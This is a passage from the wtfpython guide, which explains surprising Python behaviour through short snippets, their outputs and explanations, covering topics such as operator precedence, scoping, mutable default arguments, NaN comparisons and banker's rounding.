- This means that when the parser encounters a backslash in a raw string, it expects another character following it. In our case (`print(r"\")`), the backslash escaped the trailing quote, leaving the parser without a terminating quote (hence the `SyntaxError`). That's why backslashes don't work at the end of a raw string.

---

### ▶ not knot!

<!-- Example ID: 7034deb1-7443-417d-94ee-29a800524de8 --->

```py
x = True
y = False
```

**Output:**

```py
>>> not x == y
True
>>> x == not y
  File "<input>", line 1
    x == not y
             ^
SyntaxError: invalid syntax
```

#### 💡 Explanation:

* Operator precedence affects how an expression is evaluated, and the `==` operator has higher precedence than the `not` operator in Python.
* So `not x == y` is equivalent to `not (x == y)`, which is equivalent to `not (True == False)`, finally evaluating to `True`.
* But `x == not y` raises a `SyntaxError` because it can be thought of as being equivalent to `(x == not) y`, and not `x == (not y)` which you might have expected at first sight.
* The parser expected the `not` token to be a part of the `not in` operator (because both `==` and `not in` operators have the same precedence), but after not being able to find an `in` token following the `not` token, it raises a `SyntaxError`.
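* If what you actually meant was `x == (not y)`, spelling out the parentheses makes the grouping unambiguous; and the `not x == y` form at the top is more conventionally written as `x != y`. A quick check, reusing `x` and `y` from the snippet above:

```py
>>> x == (not y)  # parentheses force the intended grouping
True
>>> x != y        # the conventional spelling of `not x == y`
True
```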
--- ### ▶ Half triple-quoted strings <!-- Example ID: c55da3e2-1034-43b9-abeb-a7a970a2ad9e ---> **Output:** ```py >>> print('wtfpython''') wtfpython >>> print("wtfpython""") wtfpython >>> # The following statements raise `SyntaxError` >>> # print('''wtfpython') >>> # print("""wtfpython") File "<input>", line 3 print("""wtfpython") ^ SyntaxError: EOF while scanning triple-quoted string literal ``` #### 💡 Explanation: + Python supports implicit [string literal concatenation](https://docs.python.org/3/reference/lexical_analysis.html#string-literal-concatenation), Example, ``` >>> print("wtf" "python") wtfpython >>> print("wtf" "") # or "wtf""" wtf ``` + `'''` and `"""` are also string delimiters in Python which causes a SyntaxError because the Python interpreter was expecting a terminating triple quote as delimiter while scanning the currently encountered triple quoted string literal. --- ### ▶ What's wrong with booleans? <!-- Example ID: 0bba5fa7-9e6d-4cd2-8b94-952d061af5dd ---> 1\. ```py # A simple example to count the number of booleans and # integers in an iterable of mixed data types. mixed_list = [False, 1.0, "some_string", 3, True, [], False] integers_found_so_far = 0 booleans_found_so_far = 0 for item in mixed_list: if isinstance(item, int): integers_found_so_far += 1 elif isinstance(item, bool): booleans_found_so_far += 1 ``` **Output:** ```py >>> integers_found_so_far 4 >>> booleans_found_so_far 0 ``` 2\. ```py >>> some_bool = True >>> "wtf" * some_bool 'wtf' >>> some_bool = False >>> "wtf" * some_bool '' ``` 3\. ```py def tell_truth(): True = False if True == False: print("I have lost faith in truth!") ``` **Output (< 3.x):** ```py >>> tell_truth() I have lost faith in truth! ``` #### 💡 Explanation: * `bool` is a subclass of `int` in Python ```py >>> issubclass(bool, int) True >>> issubclass(int, bool) False ``` * And thus, `True` and `False` are instances of `int` ```py >>> isinstance(True, int) True >>> isinstance(False, int) True ``` * The integer value of `True` is `1` and that of `False` is `0`. ```py >>> int(True) 1 >>> int(False) 0 ``` * See this StackOverflow [answer](https://stackoverflow.com/a/8169049/4354153) for the rationale behind it. * Initially, Python used to have no `bool` type (people used 0 for false and non-zero value like 1 for true). `True`, `False`, and a `bool` type was added in 2.x versions, but, for backward compatibility, `True` and `False` couldn't be made constants. They just were built-in variables, and it was possible to reassign them * Python 3 was backward-incompatible, the issue was finally fixed, and thus the last snippet won't work with Python 3.x! --- ### ▶ Class attributes and instance attributes <!-- Example ID: 6f332208-33bd-482d-8106-42863b739ed9 ---> 1\. ```py class A: x = 1 class B(A): pass class C(A): pass ``` **Output:** ```py >>> A.x, B.x, C.x (1, 1, 1) >>> B.x = 2 >>> A.x, B.x, C.x (1, 2, 1) >>> A.x = 3 >>> A.x, B.x, C.x # C.x changed, but B.x didn't (3, 2, 3) >>> a = A() >>> a.x, A.x (3, 3) >>> a.x += 1 >>> a.x, A.x (4, 3) ``` 2\. 
```py class SomeClass: some_var = 15 some_list = [5] another_list = [5] def __init__(self, x): self.some_var = x + 1 self.some_list = self.some_list + [x] self.another_list += [x] ``` **Output:** ```py >>> some_obj = SomeClass(420) >>> some_obj.some_list [5, 420] >>> some_obj.another_list [5, 420] >>> another_obj = SomeClass(111) >>> another_obj.some_list [5, 111] >>> another_obj.another_list [5, 420, 111] >>> another_obj.another_list is SomeClass.another_list True >>> another_obj.another_list is some_obj.another_list True ``` #### 💡 Explanation: * Class variables and variables in class instances are internally handled as dictionaries of a class object. If a variable name is not found in the dictionary of the current class, the parent classes are searched for it. * The `+=` operator modifies the mutable object in-place without creating a new object. So changing the attribute of one instance affects the other instances and the class attribute as well. --- ### ▶ yielding None <!-- Example ID: 5a40c241-2c30-40d0-8ba9-cf7e097b3b53 ---> ```py some_iterable = ('a', 'b') def some_func(val): return "something" ``` **Output (<= 3.7.x):** ```py >>> [x for x in some_iterable] ['a', 'b'] >>> [(yield x) for x in some_iterable] <generator object <listcomp> at 0x7f70b0a4ad58> >>> list([(yield x) for x in some_iterable]) ['a', 'b'] >>> list((yield x) for x in some_iterable) ['a', None, 'b', None] >>> list(some_func((yield x)) for x in some_iterable) ['a', 'something', 'b', 'something'] ``` #### 💡 Explanation: - This is a bug in CPython's handling of `yield` in generators and comprehensions. - Source and explanation can be found here: https://stackoverflow.com/questions/32139885/yield-in-list-comprehensions-and-generator-expressions - Related bug report: https://bugs.python.org/issue10544 - Python 3.8+ no longer allows `yield` inside list comprehension and will throw a `SyntaxError`. --- ### ▶ Yielding from... return! * <!-- Example ID: 5626d8ef-8802-49c2-adbc-7cda5c550816 ---> 1\. ```py def some_func(x): if x == 3: return ["wtf"] else: yield from range(x) ``` **Output (> 3.3):** ```py >>> list(some_func(3)) [] ``` Where did the `"wtf"` go? Is it due to some special effect of `yield from`? Let's validate that, 2\. ```py def some_func(x): if x == 3: return ["wtf"] else: for i in range(x): yield i ``` **Output:** ```py >>> list(some_func(3)) [] ``` The same result, this didn't work either. #### 💡 Explanation: + From Python 3.3 onwards, it became possible to use `return` statement with values inside generators (See [PEP380](https://www.python.org/dev/peps/pep-0380/)). The [official docs](https://www.python.org/dev/peps/pep-0380/#enhancements-to-stopiteration) say that, > "... `return expr` in a generator causes `StopIteration(expr)` to be raised upon exit from the generator." + In the case of `some_func(3)`, `StopIteration` is raised at the beginning because of `return` statement. The `StopIteration` exception is automatically caught inside the `list(...)` wrapper and the `for` loop. Therefore, the above two snippets result in an empty list. + To get `["wtf"]` from the generator `some_func` we need to catch the `StopIteration` exception, ```py try: next(some_func(3)) except StopIteration as e: some_string = e.value ``` ```py >>> some_string ["wtf"] ``` --- ### ▶ Nan-reflexivity * <!-- Example ID: 59bee91a-36e0-47a4-8c7d-aa89bf1d3976 ---> 1\. 
```py a = float('inf') b = float('nan') c = float('-iNf') # These strings are case-insensitive d = float('nan') ``` **Output:** ```py >>> a inf >>> b nan >>> c -inf >>> float('some_other_string') ValueError: could not convert string to float: some_other_string >>> a == -c # inf==inf True >>> None == None # None == None True >>> b == d # but nan!=nan False >>> 50 / a 0.0 >>> a / a nan >>> 23 + b nan ``` 2\. ```py >>> x = float('nan') >>> y = x / x >>> y is y # identity holds True >>> y == y # equality fails of y False >>> [y] == [y] # but the equality succeeds for the list containing y True ``` #### 💡 Explanation: - `'inf'` and `'nan'` are special strings (case-insensitive), which, when explicitly typecast-ed to `float` type, are used to represent mathematical "infinity" and "not a number" respectively. - Since according to IEEE standards ` NaN != NaN`, obeying this rule breaks the reflexivity assumption of a collection element in Python i.e. if `x` is a part of a collection like `list`, the implementations like comparison are based on the assumption that `x == x`. Because of this assumption, the identity is compared first (since it's faster) while comparing two elements, and the values are compared only when the identities mismatch. The following snippet will make things clearer, ```py >>> x = float('nan') >>> x == x, [x] == [x] (False, True) >>> y = float('nan') >>> y == y, [y] == [y] (False, True) >>> x == y, [x] == [y] (False, False) ``` Since the identities of `x` and `y` are different, the values are considered, which are also different; hence the comparison returns `False` this time. - Interesting read: [Reflexivity, and other pillars of civilization](https://bertrandmeyer.com/2010/02/06/reflexivity-and-other-pillars-of-civilization/) --- ### ▶ Mutating the immutable! <!-- Example ID: 15a9e782-1695-43ea-817a-a9208f6bb33d ---> This might seem trivial if you know how references work in Python. ```py some_tuple = ("A", "tuple", "with", "values") another_tuple = ([1, 2], [3, 4], [5, 6]) ``` **Output:** ```py >>> some_tuple[2] = "change this" TypeError: 'tuple' object does not support item assignment >>> another_tuple[2].append(1000) #This throws no error >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000]) >>> another_tuple[2] += [99, 999] TypeError: 'tuple' object does not support item assignment >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000, 99, 999]) ``` But I thought tuples were immutable... #### 💡 Explanation: * Quoting from https://docs.python.org/3/reference/datamodel.html > Immutable sequences An object of an immutable sequence type cannot change once it is created. (If the object contains references to other objects, these other objects may be mutable and may be modified; however, the collection of objects directly referenced by an immutable object cannot change.) * `+=` operator changes the list in-place. The item assignment doesn't work, but when the exception occurs, the item has already been changed in place. * There's also an explanation in [official Python FAQ](https://docs.python.org/3/faq/programming.html#why-does-a-tuple-i-item-raise-an-exception-when-the-addition-works). 
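
To convince yourself that the in-place extension happens before the failed tuple item assignment, you can track the identity of the inner list. A minimal sketch (the name `inner_list` is just for illustration):

```py
another_tuple = ([1, 2], [3, 4], [5, 6])
inner_list = another_tuple[2]          # keep a direct reference to the inner list

try:
    another_tuple[2] += [99, 999]      # list.__iadd__ extends in place, then the tuple assignment fails
except TypeError as e:
    print("TypeError:", e)

print(another_tuple[2])                # [5, 6, 99, 999] -- the mutation already happened
print(inner_list is another_tuple[2])  # True -- still the very same list object
```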
--- ### ▶ The disappearing variable from outer scope <!-- Example ID: 7f1e71b6-cb3e-44fb-aa47-87ef1b7decc8 ---> ```py e = 7 try: raise Exception() except Exception as e: pass ``` **Output (Python 2.x):** ```py >>> print(e) # prints nothing ``` **Output (Python 3.x):** ```py >>> print(e) NameError: name 'e' is not defined ``` #### 💡 Explanation: * Source: https://docs.python.org/3/reference/compound_stmts.html#except When an exception has been assigned using `as` target, it is cleared at the end of the `except` clause. This is as if ```py except E as N: foo ``` was translated into ```py except E as N: try: foo finally: del N ``` This means the exception must be assigned to a different name to be able to refer to it after the except clause. Exceptions are cleared because, with the traceback attached to them, they form a reference cycle with the stack frame, keeping all locals in that frame alive until the next garbage collection occurs. * The clauses are not scoped in Python. Everything in the example is present in the same scope, and the variable `e` got removed due to the execution of the `except` clause. The same is not the case with functions that have their separate inner-scopes. The example below illustrates this: ```py def f(x): del(x) print(x) x = 5 y = [5, 4, 3] ``` **Output:** ```py >>> f(x) UnboundLocalError: local variable 'x' referenced before assignment >>> f(y) UnboundLocalError: local variable 'x' referenced before assignment >>> x 5 >>> y [5, 4, 3] ``` * In Python 2.x, the variable name `e` gets assigned to `Exception()` instance, so when you try to print, it prints nothing. **Output (Python 2.x):** ```py >>> e Exception() >>> print e # Nothing is printed! ``` --- ### ▶ The mysterious key type conversion <!-- Example ID: 00f42dd0-b9ef-408d-9e39-1bc209ce3f36 ---> ```py class SomeClass(str): pass some_dict = {'s': 42} ``` **Output:** ```py >>> type(list(some_dict.keys())[0]) str >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict # expected: Two different keys-value pairs {'s': 40} >>> type(list(some_dict.keys())[0]) str ``` #### 💡 Explanation: * Both the object `s` and the string `"s"` hash to the same value because `SomeClass` inherits the `__hash__` method of `str` class. * `SomeClass("s") == "s"` evaluates to `True` because `SomeClass` also inherits `__eq__` method from `str` class. * Since both the objects hash to the same value and are equal, they are represented by the same key in the dictionary. * For the desired behavior, we can redefine the `__eq__` method in `SomeClass` ```py class SomeClass(str): def __eq__(self, other): return ( type(self) is SomeClass and type(other) is SomeClass and super().__eq__(other) ) # When we define a custom __eq__, Python stops automatically inheriting the # __hash__ method, so we need to define it as well __hash__ = str.__hash__ some_dict = {'s':42} ``` **Output:** ```py >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict {'s': 40, 's': 42} >>> keys = list(some_dict.keys()) >>> type(keys[0]), type(keys[1]) (__main__.SomeClass, str) ``` --- ### ▶ Let's see if you can guess this? 
<!-- Example ID: 81aa9fbe-bd63-4283-b56d-6fdd14c9105e ---> ```py a, b = a[b] = {}, 5 ``` **Output:** ```py >>> a {5: ({...}, 5)} ``` #### 💡 Explanation: * According to [Python language reference](https://docs.python.org/3/reference/simple_stmts.html#assignment-statements), assignment statements have the form ``` (target_list "=")+ (expression_list | yield_expression) ``` and > An assignment statement evaluates the expression list (remember that this can be a single expression or a comma-separated list, the latter yielding a tuple) and assigns the single resulting object to each of the target lists, from left to right. * The `+` in `(target_list "=")+` means there can be **one or more** target lists. In this case, target lists are `a, b` and `a[b]` (note the expression list is exactly one, which in our case is `{}, 5`). * After the expression list is evaluated, its value is unpacked to the target lists from **left to right**. So, in our case, first the `{}, 5` tuple is unpacked to `a, b` and we now have `a = {}` and `b = 5`. * `a` is now assigned to `{}`, which is a mutable object. * The second target list is `a[b]` (you may expect this to throw an error because both `a` and `b` have not been defined in the statements before. But remember, we just assigned `a` to `{}` and `b` to `5`). * Now, we are setting the key `5` in the dictionary to the tuple `({}, 5)` creating a circular reference (the `{...}` in the output refers to the same object that `a` is already referencing). Another simpler example of circular reference could be ```py >>> some_list = some_list[0] = [0] >>> some_list [[...]] >>> some_list[0] [[...]] >>> some_list is some_list[0] True >>> some_list[0][0][0][0][0][0] == some_list True ``` Similar is the case in our example (`a[b][0]` is the same object as `a`) * So to sum it up, you can break the example down to ```py a, b = {}, 5 a[b] = a, b ``` And the circular reference can be justified by the fact that `a[b][0]` is the same object as `a` ```py >>> a[b][0] is a True ``` --- ### ▶ Exceeds the limit for integer string conversion ```py >>> # Python 3.10.6 >>> int("2" * 5432) >>> # Python 3.10.8 >>> int("2" * 5432) ``` **Output:** ```py >>> # Python 3.10.6 222222222222222222222222222222222222222222222222222222222222222... >>> # Python 3.10.8 Traceback (most recent call last): ... ValueError: Exceeds the limit (4300) for integer string conversion: value has 5432 digits; use sys.set_int_max_str_digits() to increase the limit. ``` #### 💡 Explanation: This call to `int()` works fine in Python 3.10.6 and raises a ValueError in Python 3.10.8. Note that Python can still work with large integers. The error is only raised when converting between integers and strings. Fortunately, you can increase the limit for the allowed number of digits when you expect an operation to exceed it. To do this, you can use one of the following: - The -X int_max_str_digits command-line flag - The set_int_max_str_digits() function from the sys module - The PYTHONINTMAXSTRDIGITS environment variable [Check the documentation](https://docs.python.org/3/library/stdtypes.html#int-max-str-digits) for more details on changing the default limit if you expect your code to exceed this value. --- ## Section: Slippery Slopes ### ▶ Modifying a dictionary while iterating over it <!-- Example ID: b4e5cdfb-c3a8-4112-bd38-e2356d801c41 ---> ```py x = {0: None} for i in x: del x[i] x[i+1] = None print(i) ``` **Output (Python 2.7- Python 3.5):** ``` 0 1 2 3 4 5 6 7 ``` Yes, it runs for exactly **eight** times and stops. 
#### 💡 Explanation: * Iteration over a dictionary that you edit at the same time is not supported. * It runs eight times because that's the point at which the dictionary resizes to hold more keys (we have eight deletion entries, so a resize is needed). This is actually an implementation detail. * How deleted keys are handled and when the resize occurs might be different for different Python implementations. * So for Python versions other than Python 2.7 - Python 3.5, the count might be different from 8 (but whatever the count is, it's going to be the same every time you run it). You can find some discussion around this [here](https://github.com/satwikkansal/wtfpython/issues/53) or in [this](https://stackoverflow.com/questions/44763802/bug-in-python-dict) StackOverflow thread. * Python 3.7.6 onwards, you'll see `RuntimeError: dictionary keys changed during iteration` exception if you try to do this. --- ### ▶ Stubborn `del` operation <!-- Example ID: 777ed4fd-3a2d-466f-95e7-c4058e61d78e ---> <!-- read-only --> ```py class SomeClass: def __del__(self): print("Deleted!") ``` **Output:** 1\. ```py >>> x = SomeClass() >>> y = x >>> del x # this should print "Deleted!" >>> del y Deleted! ``` Phew, deleted at last. You might have guessed what saved `__del__` from being called in our first attempt to delete `x`. Let's add more twists to the example. 2\. ```py >>> x = SomeClass() >>> y = x >>> del x >>> y # check if y exists <__main__.SomeClass instance at 0x7f98a1a67fc8> >>> del y # Like previously, this should print "Deleted!" >>> globals() # oh, it didn't. Let's check all our global variables and confirm Deleted! {'__builtins__': <module '__builtin__' (built-in)>, 'SomeClass': <class __main__.SomeClass at 0x7f98a1a5f668>, '__package__': None, '__name__': '__main__', '__doc__': None} ``` Okay, now it's deleted :confused: #### 💡 Explanation: + `del x` doesn’t directly call `x.__del__()`. + When `del x` is encountered, Python deletes the name `x` from current scope and decrements by 1 the reference count of the object `x` referenced. `__del__()` is called only when the object's reference count reaches zero. + In the second output snippet, `__del__()` was not called because the previous statement (`>>> y`) in the interactive interpreter created another reference to the same object (specifically, the `_` magic variable which references the result value of the last non `None` expression on the REPL), thus preventing the reference count from reaching zero when `del y` was encountered. + Calling `globals` (or really, executing anything that will have a non `None` result) caused `_` to reference the new result, dropping the existing reference. Now the reference count reached 0 and we can see "Deleted!" being printed (finally!). --- ### ▶ The out of scope variable <!-- Example ID: 75c03015-7be9-4289-9e22-4f5fdda056f7 ---> 1\. ```py a = 1 def some_func(): return a def another_func(): a += 1 return a ``` 2\. ```py def some_closure_func(): a = 1 def some_inner_func(): return a return some_inner_func() def another_closure_func(): a = 1 def another_inner_func(): a += 1 return a return another_inner_func() ``` **Output:** ```py >>> some_func() 1 >>> another_func() UnboundLocalError: local variable 'a' referenced before assignment >>> some_closure_func() 1 >>> another_closure_func() UnboundLocalError: local variable 'a' referenced before assignment ``` #### 💡 Explanation: * When you make an assignment to a variable in scope, it becomes local to that scope. 
So `a` becomes local to the scope of `another_func`, but it has not been initialized previously in the same scope, which is why it throws an error.
* To modify the outer scope variable `a` in `another_func`, we have to use the `global` keyword.
  ```py
  def another_func():
      global a
      a += 1
      return a
  ```

  **Output:**
  ```py
  >>> another_func()
  2
  ```
* In `another_closure_func`, `a` becomes local to the scope of `another_inner_func`, but it has not been initialized previously in the same scope, which is why it throws an error.
* To modify the outer scope variable `a` in `another_inner_func`, use the `nonlocal` keyword. The `nonlocal` statement is used to refer to variables defined in the nearest outer (excluding the global) scope.
  ```py
  def another_func():
      a = 1
      def another_inner_func():
          nonlocal a
          a += 1
          return a
      return another_inner_func()
  ```

  **Output:**
  ```py
  >>> another_func()
  2
  ```
* The keywords `global` and `nonlocal` tell the Python interpreter not to declare new variables but to look them up in the corresponding outer scopes.
* Read [this](https://sebastianraschka.com/Articles/2014_python_scope_and_namespaces.html) short but awesome guide to learn more about how namespaces and scope resolution work in Python.

---

### ▶ Deleting a list item while iterating
<!-- Example ID: 4cc52d4e-d42b-4e09-b25f-fbf5699b7d4e --->
```py
list_1 = [1, 2, 3, 4]
list_2 = [1, 2, 3, 4]
list_3 = [1, 2, 3, 4]
list_4 = [1, 2, 3, 4]

for idx, item in enumerate(list_1):
    del item

for idx, item in enumerate(list_2):
    list_2.remove(item)

for idx, item in enumerate(list_3[:]):
    list_3.remove(item)

for idx, item in enumerate(list_4):
    list_4.pop(idx)
```

**Output:**
```py
>>> list_1
[1, 2, 3, 4]
>>> list_2
[2, 4]
>>> list_3
[]
>>> list_4
[2, 4]
```

Can you guess why the output is `[2, 4]`?

#### 💡 Explanation:

* It's never a good idea to change the object you're iterating over. The correct way to do so is to iterate over a copy of the object instead, and `list_3[:]` does just that.
    ```py
    >>> some_list = [1, 2, 3, 4]
    >>> id(some_list)
    139798789457608
    >>> id(some_list[:])  # Notice that Python creates a new object for the sliced list.
    139798779601192
    ```

**Difference between `del`, `remove`, and `pop`:**
* `del var_name` just removes the binding of `var_name` from the local or global namespace (that's why `list_1` is unaffected).
* `remove` removes the first matching value, not a specific index, and raises `ValueError` if the value is not found.
* `pop` removes the element at a specific index and returns it, and raises `IndexError` if an invalid index is specified.

**Why is the output `[2, 4]`?**
- The list iteration is done index by index, and when we remove `1` from `list_2` or `list_4`, the contents of the lists become `[2, 3, 4]`. The remaining elements are shifted down, i.e., `2` is at index 0 and `3` is at index 1. Since the next iteration is going to look at index 1 (which is the `3`), the `2` gets skipped entirely. A similar thing happens with every alternate element in the list sequence.

* Refer to this StackOverflow [thread](https://stackoverflow.com/questions/45946228/what-happens-when-you-try-to-delete-a-list-element-while-iterating-over-it) for an explanation of this example.
* See also this nice StackOverflow [thread](https://stackoverflow.com/questions/45877614/how-to-change-all-the-dictionary-keys-in-a-for-loop-with-d-items) for a similar example related to dictionaries in Python.
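
As a rough sketch of the safer alternatives: either build a new list, or iterate over a copy if the original must be mutated in place (the filtering condition below is just illustrative):

```py
items = [1, 2, 3, 4]

# Option 1: build a new list with a comprehension (usually the clearest)
evens = [x for x in items if x % 2 == 0]
print(evens)   # [2, 4]

# Option 2: mutate the original, but iterate over a shallow copy of it
for item in items[:]:      # items.copy() or list(items) work just as well
    if item % 2 != 0:
        items.remove(item)
print(items)   # [2, 4]
```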
--- ### ▶ Lossy zip of iterators * <!-- Example ID: c28ed154-e59f-4070-8eb6-8967a4acac6d ---> ```py >>> numbers = list(range(7)) >>> numbers [0, 1, 2, 3, 4, 5, 6] >>> first_three, remaining = numbers[:3], numbers[3:] >>> first_three, remaining ([0, 1, 2], [3, 4, 5, 6]) >>> numbers_iter = iter(numbers) >>> list(zip(numbers_iter, first_three)) [(0, 0), (1, 1), (2, 2)] # so far so good, let's zip the remaining >>> list(zip(numbers_iter, remaining)) [(4, 3), (5, 4), (6, 5)] ``` Where did element `3` go from the `numbers` list? #### 💡 Explanation: - From Python [docs](https://docs.python.org/3.3/library/functions.html#zip), here's an approximate implementation of zip function, ```py def zip(*iterables): sentinel = object() iterators = [iter(it) for it in iterables] while iterators: result = [] for it in iterators: elem = next(it, sentinel) if elem is sentinel: return result.append(elem) yield tuple(result) ``` - So the function takes in arbitrary number of iterable objects, adds each of their items to the `result` list by calling the `next` function on them, and stops whenever any of the iterable is exhausted. - The caveat here is when any iterable is exhausted, the existing elements in the `result` list are discarded. That's what happened with `3` in the `numbers_iter`. - The correct way to do the above using `zip` would be, ```py >>> numbers = list(range(7)) >>> numbers_iter = iter(numbers) >>> list(zip(first_three, numbers_iter)) [(0, 0), (1, 1), (2, 2)] >>> list(zip(remaining, numbers_iter)) [(3, 3), (4, 4), (5, 5), (6, 6)] ``` The first argument of zip should be the one with fewest elements. --- ### ▶ Loop variables leaking out! <!-- Example ID: ccec7bf6-7679-4963-907a-1cd8587be9ea ---> 1\. ```py for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` But `x` was never defined outside the scope of for loop... 2\. ```py # This time let's initialize x first x = -1 for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` 3\. **Output (Python 2.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 4 ``` **Output (Python 3.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 1 ``` #### 💡 Explanation: - In Python, for-loops use the scope they exist in and leave their defined loop-variable behind. This also applies if we explicitly defined the for-loop variable in the global namespace before. In this case, it will rebind the existing variable. - The differences in the output of Python 2.x and Python 3.x interpreters for list comprehension example can be explained by following change documented in [What’s New In Python 3.0](https://docs.python.org/3/whatsnew/3.0.html) changelog: > "List comprehensions no longer support the syntactic form `[... for var in item1, item2, ...]`. Use `[... for var in (item1, item2, ...)]` instead. Also, note that list comprehensions have different semantics: they are closer to syntactic sugar for a generator expression inside a `list()` constructor, and in particular, the loop control variables are no longer leaked into the surrounding scope." --- ### ▶ Beware of default mutable arguments! 
<!-- Example ID: 7d42dade-e20d-4a7b-9ed7-16fb58505fe9 ---> ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func() ['some_string'] >>> some_func() ['some_string', 'some_string'] >>> some_func([]) ['some_string'] >>> some_func() ['some_string', 'some_string', 'some_string'] ``` #### 💡 Explanation: - The default mutable arguments of functions in Python aren't really initialized every time you call the function. Instead, the recently assigned value to them is used as the default value. When we explicitly passed `[]` to `some_func` as the argument, the default value of the `default_arg` variable was not used, so the function returned as expected. ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func.__defaults__ #This will show the default argument values for the function ([],) >>> some_func() >>> some_func.__defaults__ (['some_string'],) >>> some_func() >>> some_func.__defaults__ (['some_string', 'some_string'],) >>> some_func([]) >>> some_func.__defaults__ (['some_string', 'some_string'],) ``` - A common practice to avoid bugs due to mutable arguments is to assign `None` as the default value and later check if any value is passed to the function corresponding to that argument. Example: ```py def some_func(default_arg=None): if default_arg is None: default_arg = [] default_arg.append("some_string") return default_arg ``` --- ### ▶ Catching the Exceptions <!-- Example ID: b5ca5e6a-47b9-4f69-9375-cda0f8c6755d ---> ```py some_list = [1, 2, 3] try: # This should raise an ``IndexError`` print(some_list[4]) except IndexError, ValueError: print("Caught!") try: # This should raise a ``ValueError`` some_list.remove(4) except IndexError, ValueError: print("Caught again!") ``` **Output (Python 2.x):** ```py Caught! ValueError: list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 3 except IndexError, ValueError: ^ SyntaxError: invalid syntax ``` #### 💡 Explanation * To add multiple Exceptions to the except clause, you need to pass them as parenthesized tuple as the first argument. The second argument is an optional name, which when supplied will bind the Exception instance that has been raised. Example, ```py some_list = [1, 2, 3] try: # This should raise a ``ValueError`` some_list.remove(4) except (IndexError, ValueError), e: print("Caught again!") print(e) ``` **Output (Python 2.x):** ``` Caught again! list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 4 except (IndexError, ValueError), e: ^ IndentationError: unindent does not match any outer indentation level ``` * Separating the exception from the variable with a comma is deprecated and does not work in Python 3; the correct way is to use `as`. Example, ```py some_list = [1, 2, 3] try: some_list.remove(4) except (IndexError, ValueError) as e: print("Caught again!") print(e) ``` **Output:** ``` Caught again! list.remove(x): x not in list ``` --- ### ▶ Same operands, different story! <!-- Example ID: ca052cdf-dd2d-4105-b936-65c28adc18a0 ---> 1\. ```py a = [1, 2, 3, 4] b = a a = a + [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4] ``` 2\. ```py a = [1, 2, 3, 4] b = a a += [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4, 5, 6, 7, 8] ``` #### 💡 Explanation: * `a += b` doesn't always behave the same way as `a = a + b`. 
Classes *may* implement the *`op=`* operators differently, and lists do this.
* The expression `a = a + [5,6,7,8]` generates a new list and sets `a`'s reference to that new list, leaving `b` unchanged.
* The expression `a += [5,6,7,8]` is actually mapped to an "extend" function that operates on the list such that `a` and `b` still point to the same list that has been modified in-place.

---

### ▶ Name resolution ignoring class scope
<!-- Example ID: 03f73d96-151c-4929-b0a8-f74430788324 --->
1\.

```py
x = 5
class SomeClass:
    x = 17
    y = (x for i in range(10))
```

**Output:**
```py
>>> list(SomeClass.y)[0]
5
```

2\.

```py
x = 5
class SomeClass:
    x = 17
    y = [x for i in range(10)]
```

**Output (Python 2.x):**
```py
>>> SomeClass.y[0]
17
```

**Output (Python 3.x):**
```py
>>> SomeClass.y[0]
5
```

#### 💡 Explanation
- Scopes nested inside a class definition ignore names bound at the class level.
- A generator expression has its own scope.
- Starting from Python 3.x, list comprehensions also have their own scope.

---

### ▶ Rounding like a banker *

Let's implement a naive function to get the middle element of a list:
```py
def get_middle(some_list):
    mid_index = round(len(some_list) / 2)
    return some_list[mid_index - 1]
```

**Output (Python 3.x):**
```py
>>> get_middle([1])  # looks good
1
>>> get_middle([1,2,3])  # looks good
2
>>> get_middle([1,2,3,4,5])  # huh?
2
>>> len([1,2,3,4,5]) / 2  # good
2.5
>>> round(len([1,2,3,4,5]) / 2)  # why?
2
```

It seems as though Python rounded 2.5 to 2.

#### 💡 Explanation:

- This is not a floating-point precision error; in fact, this behavior is intentional. Since Python 3.0, `round()` uses [banker's rounding](https://en.wikipedia.org/wiki/Rounding#Rounding_half_to_even) where .5 fractions are rounded to the nearest **even** number:

```py
>>> round(0.5)
0
>>> round(1.5)
2
>>> round(2.5)
2
>>> import numpy  # numpy does the same
>>> numpy.round(0.5)
0.0
>>> numpy.round(1.5)
2.0
>>> numpy.round(2.5)
2.0
```

- This is the recommended way to round .5 fractions as described in [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754#Rounding_rules). However, the other way (rounding away from zero) is taught in school most of the time, so banker's rounding is likely not that well known. Furthermore, some of the most popular programming languages (for example: JavaScript, Java, C/C++, Ruby, Rust) do not use banker's rounding either. Therefore, this is still quite special to Python and may result in confusion when rounding fractions.
- See the [round() docs](https://docs.python.org/3/library/functions.html#round) or [this stackoverflow thread](https://stackoverflow.com/questions/10825926/python-3-x-rounding-behavior) for more information.
- Note that `get_middle([1])` only returned 1 because the index was `round(0.5) - 1 = 0 - 1 = -1`, returning the last element in the list.

---

### ▶ Needles in a Haystack *
<!-- Example ID: 52a199b1-989a-4b28-8910-dff562cebba9 --->
I haven't met a single experienced Pythonist to date who hasn't come across one or more of the following scenarios,

1\.

```py
x, y = (0, 1) if True else None, None
```

**Output:**
```py
>>> x, y  # expected (0, 1)
((0, 1), None)
```

2\.

```py
t = ('one', 'two')
for i in t:
    print(i)

t = ('one')
for i in t:
    print(i)

t = ()
print(t)
```

**Output:**
```py
one
two
o
n
e
()
```

3\.

```
ten_words_list = [
    "some",
    "very",
    "big",
    "list",
    "that"
    "consists",
    "of",
    "exactly",
    "ten",
    "words"
]
```

**Output**
```py
>>> len(ten_words_list)
9
```

4\.
